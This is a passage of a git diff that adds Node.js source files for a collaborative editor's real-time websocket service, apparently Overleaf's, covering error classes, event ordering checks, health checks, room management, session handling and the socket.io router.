+ super('data too large to parse', { + head: data.slice(0, 1024), + length: data.length, + }) + } +} + +class DocumentUpdaterRequestFailedError extends OError { + constructor(action, statusCode) { + super('doc updater returned a non-success status code', { + action, + statusCode, + }) + } +} + +class JoinLeaveEpochMismatchError extends OError { + constructor() { + super('joinLeaveEpoch mismatch') + } +} + +class MissingSessionError extends OError { + constructor() { + super('could not look up session by key') + } +} + +class NotAuthorizedError extends OError { + constructor() { + super('not authorized') + } +} + +class NotJoinedError extends OError { + constructor() { + super('no project_id found on client') + } +} + +class NullBytesInOpError extends OError { + constructor(jsonChange) { + super('null bytes found in op', { jsonChange }) + } +} + +class UnexpectedArgumentsError extends OError { + constructor() { + super('unexpected arguments') + } +} + +class UpdateTooLargeError extends OError { + constructor(updateSize) { + super('update is too large', { updateSize }) + } +} + +class WebApiRequestFailedError extends OError { + constructor(statusCode) { + super('non-success status code from web', { statusCode }) + } +} + +module.exports = { + CodedError, + CorruptedJoinProjectResponseError, + ClientRequestedMissingOpsError, + DataTooLargeToParseError, + DocumentUpdaterRequestFailedError, + JoinLeaveEpochMismatchError, + MissingSessionError, + NotAuthorizedError, + NotJoinedError, + NullBytesInOpError, + UnexpectedArgumentsError, + UpdateTooLargeError, + WebApiRequestFailedError, +} diff --git a/services/real-time/app/js/EventLogger.js b/services/real-time/app/js/EventLogger.js new file mode 100644 index 0000000..44496eb --- /dev/null +++ b/services/real-time/app/js/EventLogger.js @@ -0,0 +1,81 @@ +let EventLogger +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const settings = require('@overleaf/settings') + +// keep track of message counters to detect duplicate and out of order events +// messsage ids have the format "UNIQUEHOSTKEY-COUNTER" + +const EVENT_LOG_COUNTER = {} +const EVENT_LOG_TIMESTAMP = {} +let EVENT_LAST_CLEAN_TIMESTAMP = 0 + +// counter for debug logs +let COUNTER = 0 + +module.exports = EventLogger = { + MAX_STALE_TIME_IN_MS: 3600 * 1000, + + debugEvent(channel, message) { + if (settings.debugEvents > 0) { + logger.info({ channel, message, counter: COUNTER++ }, 'logging event') + settings.debugEvents-- + } + }, + + checkEventOrder(channel, messageId) { + if (typeof messageId !== 'string') { + return + } + let result + if (!(result = messageId.match(/^(.*)-(\d+)$/))) { + return + } + const key = result[1] + const count = parseInt(result[2], 0) + if (!(count >= 0)) { + // ignore checks if counter is not present + return + } + // store the last count in a hash for each host + const previous = EventLogger._storeEventCount(key, count) + if (!previous || count === previous + 1) { + metrics.inc(`event.${channel}.valid`) + return // order is ok + } + if (count === previous) { + metrics.inc(`event.${channel}.duplicate`) + logger.warn({ channel, messageId }, 'duplicate event') + return 'duplicate' + } else { + metrics.inc(`event.${channel}.out-of-order`) + logger.warn( + { channel, messageId, key, previous, count }, + 'out of order event' + ) + return 'out-of-order' + } + }, + + _storeEventCount(key, count) { + const previous = EVENT_LOG_COUNTER[key] + const now = Date.now() + EVENT_LOG_COUNTER[key] = count + EVENT_LOG_TIMESTAMP[key] = now + // periodically remove old counts + if (now - EVENT_LAST_CLEAN_TIMESTAMP > EventLogger.MAX_STALE_TIME_IN_MS) { + EventLogger._cleanEventStream(now) + EVENT_LAST_CLEAN_TIMESTAMP = now + } + return previous + }, + + _cleanEventStream(now) { + Object.entries(EVENT_LOG_TIMESTAMP).forEach(([key, timestamp]) => { + if (now - timestamp > EventLogger.MAX_STALE_TIME_IN_MS) { + delete EVENT_LOG_COUNTER[key] + delete EVENT_LOG_TIMESTAMP[key] + } + }) + }, +} diff --git a/services/real-time/app/js/HealthCheckManager.js b/services/real-time/app/js/HealthCheckManager.js new file mode 100644 index 0000000..4ced9e0 --- /dev/null +++ b/services/real-time/app/js/HealthCheckManager.js @@ -0,0 +1,77 @@ +const metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') + +const os = require('node:os') +const HOST = os.hostname() +const PID = process.pid +let COUNT = 0 + +const CHANNEL_MANAGER = {} // hash of event checkers by channel name +const CHANNEL_ERROR = {} // error status by channel name + +module.exports = class HealthCheckManager { + // create an instance of this class which checks that an event with a unique + // id is received only once within a timeout + constructor(channel, timeout) { + // unique event string + this.channel = channel + this.id = `host=${HOST}:pid=${PID}:count=${COUNT++}` + // count of number of times the event is received + this.count = 0 + // after a timeout check the status of the count + this.handler = setTimeout(() => { + this.setStatus() + }, timeout || 1000) + // use a timer to record the latency of the channel + this.timer = new metrics.Timer(`event.${this.channel}.latency`) + // keep a record of these objects to dispatch on + CHANNEL_MANAGER[this.channel] = this + } + + processEvent(id) { + // if this is our event record it + if (id === this.id) { + this.count++ + if (this.timer) { + this.timer.done() + } + this.timer = undefined // only time the latency of the first event + } + } + + setStatus() { + // if we saw the event anything other than a single time that is an error + const isFailing = this.count !== 1 + if (isFailing) { + logger.err( + { channel: this.channel, count: this.count, id: this.id }, + 'redis channel health check error' + ) + } + CHANNEL_ERROR[this.channel] = isFailing + } + + // class methods + static check(channel, id) { + // dispatch event to manager for channel + if (CHANNEL_MANAGER[channel]) { + CHANNEL_MANAGER[channel].processEvent(id) + } + } + + static status() { + // return status of all channels for logging + return CHANNEL_ERROR + } + + static isFailing() { + // check if any channel status is bad + for (const channel in CHANNEL_ERROR) { + const error = CHANNEL_ERROR[channel] + if (error === true) { + return true + } + } + return false + } +} diff --git a/services/real-time/app/js/HttpApiController.js b/services/real-time/app/js/HttpApiController.js new file mode 100644 index 0000000..122f183 --- /dev/null +++ b/services/real-time/app/js/HttpApiController.js @@ -0,0 +1,49 @@ +const WebsocketLoadBalancer = require('./WebsocketLoadBalancer') +const DrainManager = require('./DrainManager') +const logger = require('@overleaf/logger') + +module.exports = { + sendMessage(req, res) { + logger.debug({ message: req.params.message }, 'sending message') + if (Array.isArray(req.body)) { + for (const payload of req.body) { + WebsocketLoadBalancer.emitToRoom( + req.params.project_id, + req.params.message, + payload + ) + } + } else { + WebsocketLoadBalancer.emitToRoom( + req.params.project_id, + req.params.message, + req.body + ) + } + res.sendStatus(204) + }, + + startDrain(req, res) { + const io = req.app.get('io') + let rate = req.query.rate || '4' + rate = parseFloat(rate) || 0 + logger.info({ rate }, 'setting client drain rate') + DrainManager.startDrain(io, rate) + res.sendStatus(204) + }, + + disconnectClient(req, res, next) { + const io = req.app.get('io') + const { client_id: clientId } = req.params + const client = io.sockets.sockets[clientId] + + if (!client) { + logger.debug({ clientId }, 'api: client already disconnected') + res.sendStatus(404) + return + } + logger.info({ clientId }, 'api: requesting client disconnect') + client.on('disconnect', () => res.sendStatus(204)) + client.disconnect() + }, +} diff --git a/services/real-time/app/js/HttpController.js b/services/real-time/app/js/HttpController.js new file mode 100644 index 0000000..79978ed --- /dev/null +++ b/services/real-time/app/js/HttpController.js @@ -0,0 +1,53 @@ +let HttpController +module.exports = HttpController = { + // The code in this controller is hard to unit test because of a lot of + // dependencies on internal socket.io methods. It is not critical to the running + // of Overleaf, and is only used for getting stats about connected clients, + // and for checking internal state in acceptance tests. The acceptances tests + // should provide appropriate coverage. + _getConnectedClientView(ioClient) { + const clientId = ioClient.id + const { + project_id: projectId, + user_id: userId, + first_name: firstName, + last_name: lastName, + email, + connected_time: connectedTime, + } = ioClient.ol_context + const client = { + client_id: clientId, + project_id: projectId, + user_id: userId, + first_name: firstName, + last_name: lastName, + email, + connected_time: connectedTime, + } + client.rooms = Object.keys(ioClient.manager.roomClients[clientId] || {}) + // drop the namespace + .filter(room => room !== '') + // room names are composed as '<NAMESPACE>/<ROOM>' and the default + // namespace is empty (see comments in RoomManager), just drop the '/' + .map(fullRoomPath => fullRoomPath.slice(1)) + return client + }, + + getConnectedClients(req, res) { + const io = req.app.get('io') + const ioClients = io.sockets.clients() + + res.json(ioClients.map(HttpController._getConnectedClientView)) + }, + + getConnectedClient(req, res) { + const { client_id: clientId } = req.params + const io = req.app.get('io') + const ioClient = io.sockets.sockets[clientId] + if (!ioClient) { + res.sendStatus(404) + return + } + res.json(HttpController._getConnectedClientView(ioClient)) + }, +} diff --git a/services/real-time/app/js/RedisClientManager.js b/services/real-time/app/js/RedisClientManager.js new file mode 100644 index 0000000..63eccef --- /dev/null +++ b/services/real-time/app/js/RedisClientManager.js @@ -0,0 +1,19 @@ +const redis = require('@overleaf/redis-wrapper') +const logger = require('@overleaf/logger') + +module.exports = { + createClientList(...configs) { + // create a dynamic list of redis clients, excluding any configurations which are not defined + return configs.filter(Boolean).map(x => { + const redisType = x.cluster + ? 'cluster' + : x.sentinels + ? 'sentinel' + : x.host + ? 'single' + : 'unknown' + logger.debug({ redis: redisType }, 'creating redis client') + return redis.createClient(x) + }) + }, +} diff --git a/services/real-time/app/js/RoomManager.js b/services/real-time/app/js/RoomManager.js new file mode 100644 index 0000000..47302d5 --- /dev/null +++ b/services/real-time/app/js/RoomManager.js @@ -0,0 +1,161 @@ +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const { EventEmitter } = require('node:events') +const OError = require('@overleaf/o-error') + +const IdMap = new Map() // keep track of whether ids are from projects or docs +const RoomEvents = new EventEmitter() // emits {project,doc}-active and {project,doc}-empty events + +// Manage socket.io rooms for individual projects and docs +// +// The first time someone joins a project or doc we emit a 'project-active' or +// 'doc-active' event. +// +// When the last person leaves a project or doc, we emit 'project-empty' or +// 'doc-empty' event. +// +// The pubsub side is handled by ChannelManager + +module.exports = { + joinProject(client, projectId, callback) { + this.joinEntity(client, 'project', projectId, callback) + }, + + joinDoc(client, docId, callback) { + this.joinEntity(client, 'doc', docId, callback) + }, + + leaveDoc(client, docId) { + this.leaveEntity(client, 'doc', docId) + }, + + leaveProjectAndDocs(client) { + // what rooms is this client in? we need to leave them all. socket.io + // will cause us to leave the rooms, so we only need to manage our + // channel subscriptions... but it will be safer if we leave them + // explicitly, and then socket.io will just regard this as a client that + // has not joined any rooms and do a final disconnection. + const roomsToLeave = this._roomsClientIsIn(client) + logger.debug({ client: client.id, roomsToLeave }, 'client leaving project') + for (const id of roomsToLeave) { + const entity = IdMap.get(id) + this.leaveEntity(client, entity, id) + } + }, + + emitOnCompletion(promiseList, eventName) { + Promise.all(promiseList) + .then(() => RoomEvents.emit(eventName)) + .catch(err => RoomEvents.emit(eventName, err)) + }, + + eventSource() { + return RoomEvents + }, + + joinEntity(client, entity, id, callback) { + const beforeCount = this._clientsInRoom(client, id) + // client joins room immediately but joinDoc request does not complete + // until room is subscribed + client.join(id) + // is this a new room? if so, subscribe + if (beforeCount === 0) { + logger.debug({ entity, id }, 'room is now active') + RoomEvents.once(`${entity}-subscribed-${id}`, function (err) { + // only allow the client to join when all the relevant channels have subscribed + if (err) { + OError.tag(err, 'error joining', { entity, id }) + return callback(err) + } + logger.debug( + { client: client.id, entity, id, beforeCount }, + 'client joined new room and subscribed to channel' + ) + callback(err) + }) + RoomEvents.emit(`${entity}-active`, id) + IdMap.set(id, entity) + // keep track of the number of listeners + metrics.gauge('room-listeners', RoomEvents.eventNames().length) + } else { + logger.debug( + { client: client.id, entity, id, beforeCount }, + 'client joined existing room' + ) + callback() + } + }, + + leaveEntity(client, entity, id) { + // Ignore any requests to leave when the client is not actually in the + // room. This can happen if the client sends spurious leaveDoc requests + // for old docs after a reconnection. + // This can now happen all the time, as we skip the join for clients that + // disconnect before joinProject/joinDoc completed. + if (!this._clientAlreadyInRoom(client, id)) { + logger.debug( + { client: client.id, entity, id }, + 'ignoring request from client to leave room it is not in' + ) + return + } + client.leave(id) + const afterCount = this._clientsInRoom(client, id) + logger.debug( + { client: client.id, entity, id, afterCount }, + 'client left room' + ) + // is the room now empty? if so, unsubscribe + if (!entity) { + logger.error({ entity: id }, 'unknown entity when leaving with id') + return + } + if (afterCount === 0) { + logger.debug({ entity, id }, 'room is now empty') + RoomEvents.emit(`${entity}-empty`, id) + IdMap.delete(id) + metrics.gauge('room-listeners', RoomEvents.eventNames().length) + } + }, + + // internal functions below, these access socket.io rooms data directly and + // will need updating for socket.io v2 + + // The below code makes some assumptions that are always true for v0 + // - we are using the base namespace '', so room names are '/<ENTITY>' + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/manager.js#L62 + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/manager.js#L1018 + // - client.namespace is a Namespace + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/namespace.js#L204 + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/socket.js#L40 + // - client.manager is a Manager + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/namespace.js#L204 + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/socket.js#L41 + // - a Manager has + // - `.rooms={'NAMESPACE/ENTITY': []}` and + // - `.roomClients={'CLIENT_ID': {'...': true}}` + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/manager.js#L287-L288 + // https://github.com/socketio/socket.io/blob/e4d61b1be65ac3313a85da111a46777aa8d4aae3/lib/manager.js#L444-L455 + + _clientsInRoom(client, room) { + const clients = client.manager.rooms['/' + room] || [] + return clients.length + }, + + _roomsClientIsIn(client) { + const rooms = client.manager.roomClients[client.id] || {} + return ( + Object.keys(rooms) + // drop the namespace + .filter(room => room !== '') + // room names are composed as '<NAMESPACE>/<ROOM>' and the default + // namespace is empty (see comments above), just drop the '/' + .map(fullRoomPath => fullRoomPath.slice(1)) + ) + }, + + _clientAlreadyInRoom(client, room) { + const rooms = client.manager.roomClients[client.id] || {} + return !!rooms['/' + room] + }, +} diff --git a/services/real-time/app/js/Router.js b/services/real-time/app/js/Router.js new file mode 100644 index 0000000..238dc38 --- /dev/null +++ b/services/real-time/app/js/Router.js @@ -0,0 +1,607 @@ +const metrics = require('@overleaf/metrics') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const WebsocketController = require('./WebsocketController') +const HttpController = require('./HttpController') +const HttpApiController = require('./HttpApiController') +const WebsocketAddressManager = require('./WebsocketAddressManager') +const bodyParser = require('body-parser') +const base64id = require('base64id') +const { UnexpectedArgumentsError } = require('./Errors') +const Joi = require('joi') + +const HOSTNAME = require('node:os').hostname() +const SERVER_PING_INTERVAL = 15000 +const SERVER_PING_LATENCY_THRESHOLD = 5000 + +const JOI_OBJECT_ID = Joi.string() + .required() + .regex(/^[0-9a-f]{24}$/) + .message('invalid id') + +let Router +module.exports = Router = { + _handleError(callback, error, client, method, attrs) { + attrs = attrs || {} + for (const key of ['project_id', 'user_id']) { + attrs[key] = attrs[key] || client.ol_context[key] + } + attrs.client_id = client.id + attrs.err = error + attrs.method = method + if (Joi.isError(error)) { + logger.info(attrs, 'validation error') + let message = 'invalid' + try { + message = error.details[0].message + } catch (e) { + // ignore unexpected errors + logger.warn({ error, e }, 'unexpected validation error') + } + const serializedError = { message } + metrics.inc('validation-error', 1, { + status: method, + }) + callback(serializedError) + } else if (error.name === 'CodedError') { + logger.warn(attrs, error.message) + const serializedError = { message: error.message, code: error.info.code } + callback(serializedError) + } else if (error.message === 'unexpected arguments') { + // the payload might be very large; put it on level debug + logger.debug(attrs, 'unexpected arguments') + metrics.inc('unexpected-arguments', 1, { status: method }) + const serializedError = { message: error.message } + callback(serializedError) + } else if (error.message === 'no project_id found on client') { + logger.debug(attrs, error.message) + const serializedError = { message: error.message } + callback(serializedError) + } else if ( + [ + 'not authorized', + 'joinLeaveEpoch mismatch', + 'doc updater could not load requested ops', + 'no project_id found on client', + 'cannot join multiple projects', + ].includes(error.message) + ) { + logger.warn(attrs, error.message) + const serializedError = { message: error.message } + callback(serializedError) + } else { + logger.error(attrs, `server side error in ${method}`) + // Don't return raw error to prevent leaking server side info + const serializedError = { + message: 'Something went wrong in real-time service', + } + callback(serializedError) + } + if (attrs.disconnect) { + setTimeout(function () { + client.disconnect() + }, 100) + } + }, + + _handleInvalidArguments(client, method, args) { + const error = new UnexpectedArgumentsError() + let callback = args[args.length - 1] + if (typeof callback !== 'function') { + callback = function () {} + } + const attrs = { arguments: args } + Router._handleError(callback, error, client, method, attrs) + }, + + configure(app, io, session) { + app.set('io', io) + + if (settings.behindProxy) { + app.set('trust proxy', settings.trustedProxyIps) + } + const websocketAddressManager = new WebsocketAddressManager( + settings.behindProxy, + settings.trustedProxyIps + ) + + app.get('/clients', HttpController.getConnectedClients) + app.get('/clients/:client_id', HttpController.getConnectedClient) + + app.post( + '/project/:project_id/message/:message', + bodyParser.json({ limit: '5mb' }), + HttpApiController.sendMessage + ) + + app.post('/drain', HttpApiController.startDrain) + app.post( + '/client/:client_id/disconnect', + HttpApiController.disconnectClient + ) + + session.on('connection', function (error, client, session) { + // init client context, we may access it in Router._handleError before + // setting any values + client.ol_context = {} + // bail out from joinDoc when a parallel joinDoc or leaveDoc is running + client.joinLeaveEpoch = 0 + + if (client) { + client.on('error', function (err) { + logger.err( + { clientErr: err, publicId: client.publicId, clientId: client.id }, + 'socket.io client error' + ) + if (client.connected) { + client.emit('reconnectGracefully') + client.disconnect() + } + }) + } + + if (settings.shutDownInProgress) { + client.emit('connectionRejected', { message: 'retry' }) + client.disconnect() + return + } + + if ( + client && + error && + error.message.match(/could not look up session by key/) + ) { + logger.warn( + { err: error, client: !!client, session: !!session }, + 'invalid session' + ) + // tell the client to reauthenticate if it has an invalid session key + client.emit('connectionRejected', { message: 'invalid session' }) + client.disconnect() + return + } + + if (error) { + logger.err( + { err: error, client: !!client, session: !!session }, + 'error when client connected' + ) + if (client) { + client.emit('connectionRejected', { message: 'error' }) + } + if (client) { + client.disconnect() + } + return + } + const useServerPing = + !!client.handshake?.query?.esh && + !!client.handshake?.query?.ssp && + // No server ping with long-polling transports. + client.transport === 'websocket' + const isDebugging = !!client.handshake?.query?.debugging + const projectId = client.handshake?.query?.projectId + + if (isDebugging) { + client.connectedAt = Date.now() + client.isDebugging = true + } + + if (!isDebugging) { + try { + Joi.assert(projectId, JOI_OBJECT_ID) + } catch (error) { + metrics.inc('socket-io.connection', 1, { + status: client.transport, + method: projectId ? 'bad-project-id' : 'missing-project-id', + }) + client.emit('connectionRejected', { + message: 'missing/bad ?projectId=... query flag on handshake', + }) + client.disconnect() + return + } + } + + // The client.id is security sensitive. Generate a publicId for sending to other clients. + client.publicId = 'P.' + base64id.generateId() + + client.remoteIp = websocketAddressManager.getRemoteIp(client.handshake) + const headers = client.handshake && client.handshake.headers + client.userAgent = headers && headers['user-agent'] + + metrics.inc('socket-io.connection', 1, { + status: client.transport, + method: 'auto-join-project', + }) + metrics.gauge('socket-io.clients', io.sockets.clients().length) + + let user + if (session && session.passport && session.passport.user) { + ;({ user } = session.passport) + } else if (session && session.user) { + ;({ user } = session) + } else { + const anonymousAccessToken = session?.anonTokenAccess?.[projectId] + user = { _id: 'anonymous-user', anonymousAccessToken } + } + + const info = { + userId: user._id, + projectId, + transport: client.transport, + publicId: client.publicId, + clientId: client.id, + isDebugging, + } + if (isDebugging) { + logger.info(info, 'client connected') + } else { + logger.debug(info, 'client connected') + } + + const connectionDetails = { + userId: user._id, + projectId, + remoteIp: client.remoteIp, + publicId: client.publicId, + clientId: client.id, + } + + let pingTimestamp + let pingId = -1 + let pongId = -1 + const pingTimer = useServerPing + ? setInterval(function () { + if (pongId !== pingId) { + logger.warn( + { + ...connectionDetails, + pingId, + pongId, + lastPingTimestamp: pingTimestamp, + }, + 'no client response to last ping' + ) + } + pingTimestamp = Date.now() + client.emit( + 'serverPing', + ++pingId, + pingTimestamp, + client.transport, + client.id + ) + }, SERVER_PING_INTERVAL) + : null + client.on( + 'clientPong', + function ( + receivedPingId, + sentTimestamp, + serverTransport, + serverSessionId, + clientTransport, + clientSessionId + ) { + pongId = receivedPingId + const receivedTimestamp = Date.now() + if ( + receivedPingId !== pingId || + (serverSessionId && serverSessionId !== clientSessionId) + ) { + logger.warn( + { + ...connectionDetails, + receivedPingId, + pingId, + sentTimestamp, + receivedTimestamp, + latency: receivedTimestamp - sentTimestamp, + lastPingTimestamp: pingTimestamp, + serverTransport, + serverSessionId, + clientTransport, + clientSessionId, + }, + 'received pong with wrong counter' + ) + } else if ( + receivedTimestamp - sentTimestamp > + SERVER_PING_LATENCY_THRESHOLD + ) { + logger.warn( + { + ...connectionDetails, + receivedPingId, + pingId, + sentTimestamp, + receivedTimestamp, + latency: receivedTimestamp - sentTimestamp, + lastPingTimestamp: pingTimestamp, + }, + 'received pong with high latency' + ) + } + } + ) + + if (settings.exposeHostname) { + client.on('debug.getHostname', function (callback) { + if (typeof callback !== 'function') { + return Router._handleInvalidArguments( + client, + 'debug.getHostname', + arguments + ) + } + callback(HOSTNAME) + }) + } + client.on('debug', (data, callback) => { + if (typeof callback !== 'function') { + return Router._handleInvalidArguments(client, 'debug', arguments) + } + + logger.info( + { publicId: client.publicId, clientId: client.id }, + 'received debug message' + ) + + const response = { + serverTime: Date.now(), + data, + client: { + publicId: client.publicId, + remoteIp: client.remoteIp, + userAgent: client.userAgent, + connected: !client.disconnected, + connectedAt: client.connectedAt, + }, + server: { + hostname: settings.exposeHostname ? HOSTNAME : undefined, + }, + } + + callback(response) + }) + const joinProject = function (callback) { + WebsocketController.joinProject( + client, + user, + projectId, + function (err, ...args) { + if (err) { + Router._handleError(callback, err, client, 'joinProject', { + project_id: projectId, + user_id: user._id, + }) + } else { + callback(null, ...args) + } + } + ) + } + + client.on('disconnect', function () { + metrics.inc('socket-io.disconnect', 1, { status: client.transport }) + metrics.gauge('socket-io.clients', io.sockets.clients().length) + + if (client.isDebugging) { + const duration = Date.now() - client.connectedAt + metrics.timing('socket-io.debugging.duration', duration) + logger.info( + { duration, publicId: client.publicId, clientId: client.id }, + 'debug client disconnected' + ) + } else { + clearInterval(pingTimer) + } + + WebsocketController.leaveProject(io, client, function (err) { + if (err) { + Router._handleError(function () {}, err, client, 'leaveProject') + } + }) + }) + + // Variadic. The possible arguments: + // doc_id, callback + // doc_id, fromVersion, callback + // doc_id, options, callback + // doc_id, fromVersion, options, callback + client.on('joinDoc', function (docId, fromVersion, options, callback) { + if (typeof fromVersion === 'function' && !options) { + callback = fromVersion + fromVersion = -1 + options = {} + } else if ( + typeof fromVersion === 'number' && + typeof options === 'function' + ) { + callback = options + options = {} + } else if ( + typeof fromVersion === 'object' && + typeof options === 'function' + ) { + callback = options + options = fromVersion + fromVersion = -1 + } else if ( + typeof fromVersion === 'number' && + typeof options === 'object' && + typeof callback === 'function' + ) { + // Called with 4 args, things are as expected + } else { + return Router._handleInvalidArguments(client, 'joinDoc', arguments) + } + try { + Joi.assert( + { doc_id: docId, fromVersion, options }, + Joi.object({ + doc_id: JOI_OBJECT_ID, + fromVersion: Joi.number().integer(), + options: Joi.object().required(), + }) + ) + } catch (error) { + return Router._handleError(callback, error, client, 'joinDoc', { + disconnect: 1, + }) + } + WebsocketController.joinDoc( + client, + docId, + fromVersion, + options, + function (err, ...args) { + if (err) { + Router._handleError(callback, err, client, 'joinDoc', { + doc_id: docId, + fromVersion, + }) + } else { + callback(null, ...args) + } + } + ) + }) + + client.on('leaveDoc', function (docId, callback) { + if (typeof callback !== 'function') { + return Router._handleInvalidArguments(client, 'leaveDoc', arguments) + } + try { + Joi.assert(docId, JOI_OBJECT_ID) + } catch (error) { + return Router._handleError(callback, error, client, 'joinDoc', { + disconnect: 1, + }) + } + WebsocketController.leaveDoc(client, docId, function (err, ...args) { + if (err) { + Router._handleError(callback, err, client, 'leaveDoc', { + doc_id: docId, + }) + } else { + callback(null, ...args) + } + }) + }) + + client.on('clientTracking.getConnectedUsers', function (callback) { + if (typeof callback !== 'function') { + return Router._handleInvalidArguments( + client, + 'clientTracking.getConnectedUsers', + arguments + ) + } + + WebsocketController.getConnectedUsers(client, function (err, users) { + if (err) { + Router._handleError( + callback, + err, + client, + 'clientTracking.getConnectedUsers' + ) + } else { + callback(null, users) + } + }) + }) + + client.on( + 'clientTracking.updatePosition', + function (cursorData, callback) { + if (!callback) { + callback = function () { + // NOTE: The frontend does not pass any callback to socket.io. + // Any error is already logged via Router._handleError. + } + } + if (typeof callback !== 'function') { + return Router._handleInvalidArguments( + client, + 'clientTracking.updatePosition', + arguments + ) + } + + WebsocketController.updateClientPosition( + client, + cursorData, + function (err) { + if (err) { + Router._handleError( + callback, + err, + client, + 'clientTracking.updatePosition' + ) + } else { + callback() + } + } + ) + } + ) + + client.on('applyOtUpdate', function (docId, update, callback) { + if (typeof callback !== 'function') { + return Router._handleInvalidArguments( + client, + 'applyOtUpdate', + arguments + ) + } + try { + Joi.assert( + { doc_id: docId, update }, + Joi.object({ + doc_id: JOI_OBJECT_ID, + update: Joi.object().required(), + }) + ) + } catch (error) { + return Router._handleError(callback, error, client, 'applyOtUpdate', { + disconnect: 1, + }) + } + WebsocketController.applyOtUpdate( + client, + docId, + update, + function (err) { + if (err) { + Router._handleError(callback, err, client, 'applyOtUpdate', { + doc_id: docId, + }) + } else { + callback() + } + } + ) + }) + + if (!isDebugging) { + joinProject((err, project, permissionsLevel, protocolVersion) => { + if (err) { + client.emit('connectionRejected', err) + client.disconnect() + return + } + client.emit('joinProjectResponse', { + publicId: client.publicId, + project, + permissionsLevel, + protocolVersion, + }) + }) + } + }) + }, +} diff --git a/services/real-time/app/js/SafeJsonParse.js b/services/real-time/app/js/SafeJsonParse.js new file mode 100644 index 0000000..bc7a6be --- /dev/null +++ b/services/real-time/app/js/SafeJsonParse.js @@ -0,0 +1,17 @@ +const Settings = require('@overleaf/settings') +const { DataTooLargeToParseError } = require('./Errors') + +module.exports = { + parse(data, callback) { + if (data.length > Settings.maxUpdateSize) { + return callback(new DataTooLargeToParseError(data)) + } + let parsed + try { + parsed = JSON.parse(data) + } catch (e) { + return callback(e) + } + callback(null, parsed) + }, +} diff --git a/services/real-time/app/js/SessionSockets.js b/services/real-time/app/js/SessionSockets.js new file mode 100644 index 0000000..c454ccb --- /dev/null +++ b/services/real-time/app/js/SessionSockets.js @@ -0,0 +1,45 @@ +const metrics = require('@overleaf/metrics') +const OError = require('@overleaf/o-error') +const { EventEmitter } = require('node:events') +const { MissingSessionError } = require('./Errors') + +module.exports = function (io, sessionStore, cookieParser, cookieName) { + const missingSessionError = new MissingSessionError() + + const sessionSockets = new EventEmitter() + function next(error, socket, session) { + sessionSockets.emit('connection', error, socket, session) + } + + io.on('connection', function (socket) { + const req = socket.handshake + cookieParser(req, {}, function () { + const sessionId = req.signedCookies && req.signedCookies[cookieName] + if (!sessionId) { + metrics.inc('session.cookie', 1, { + // the cookie-parser middleware sets the signed cookie to false if the + // signature is invalid, so we can use this to detect bad signatures + status: sessionId === false ? 'bad-signature' : 'none', + }) + return next(missingSessionError, socket) + } + sessionStore.get(sessionId, function (error, session) { + if (error) { + metrics.inc('session.cookie', 1, { status: 'error' }) + OError.tag(error, 'error getting session from sessionStore', { + sessionId, + }) + return next(error, socket) + } + if (!session) { + metrics.inc('session.cookie', 1, { status: 'missing' }) + return next(missingSessionError, socket) + } + metrics.inc('session.cookie', 1, { status: 'signed' }) + next(null, socket, session) + }) + }) + }) + + return sessionSockets +} diff --git a/services/real-time/app/js/WebApiManager.js b/services/real-time/app/js/WebApiManager.js new file mode 100644 index 0000000..efc7092 --- /dev/null +++ b/services/real-time/app/js/WebApiManager.js @@ -0,0 +1,63 @@ +const request = require('request') +const OError = require('@overleaf/o-error') +const settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const { + CodedError, + CorruptedJoinProjectResponseError, + NotAuthorizedError, + WebApiRequestFailedError, +} = require('./Errors') + +module.exports = { + joinProject(projectId, user, callback) { + const userId = user._id + logger.debug({ projectId, userId }, 'sending join project request to web') + const url = `${settings.apis.web.url}/project/${projectId}/join` + request.post( + { + url, + auth: { + user: settings.apis.web.user, + pass: settings.apis.web.pass, + sendImmediately: true, + }, + json: { + userId, + anonymousAccessToken: user.anonymousAccessToken, + }, + jar: false, + }, + function (error, response, data) { + if (error) { + OError.tag(error, 'join project request failed') + return callback(error) + } + if (response.statusCode >= 200 && response.statusCode < 300) { + if (!(data && data.project)) { + return callback(new CorruptedJoinProjectResponseError()) + } + const userMetadata = { + isRestrictedUser: data.isRestrictedUser, + isTokenMember: data.isTokenMember, + isInvitedMember: data.isInvitedMember, + } + callback(null, data.project, data.privilegeLevel, userMetadata) + } else if (response.statusCode === 429) { + callback( + new CodedError( + 'rate-limit hit when joining project', + 'TooManyRequests' + ) + ) + } else if (response.statusCode === 403) { + callback(new NotAuthorizedError()) + } else if (response.statusCode === 404) { + callback(new CodedError('project not found', 'ProjectNotFound')) + } else { + callback(new WebApiRequestFailedError(response.statusCode)) + } + } + ) + }, +} diff --git a/services/real-time/app/js/WebsocketAddressManager.js b/services/real-time/app/js/WebsocketAddressManager.js new file mode 100644 index 0000000..d01f081 --- /dev/null +++ b/services/real-time/app/js/WebsocketAddressManager.js @@ -0,0 +1,39 @@ +const proxyaddr = require('proxy-addr') + +module.exports = class WebsocketAddressManager { + constructor(behindProxy, trustedProxyIps) { + if (behindProxy) { + // parse trustedProxyIps comma-separated list the same way as express + this.trust = proxyaddr.compile( + trustedProxyIps ? trustedProxyIps.split(/ *, */) : [] + ) + } + } + + getRemoteIp(clientHandshake) { + if (!clientHandshake) { + return 'client-handshake-missing' + } else if (this.trust) { + // create a dummy req object using the client handshake and + // connection.remoteAddress for the proxy-addr module to parse + try { + const addressPort = clientHandshake.address + const req = { + headers: { + 'x-forwarded-for': + clientHandshake.headers && + clientHandshake.headers['x-forwarded-for'], + }, + connection: { remoteAddress: addressPort && addressPort.address }, + } + // return the address parsed from x-forwarded-for + return proxyaddr(req, this.trust) + } catch (err) { + return 'client-handshake-invalid' + } + } else { + // return the address from the client handshake itself + return clientHandshake.address && clientHandshake.address.address + } + 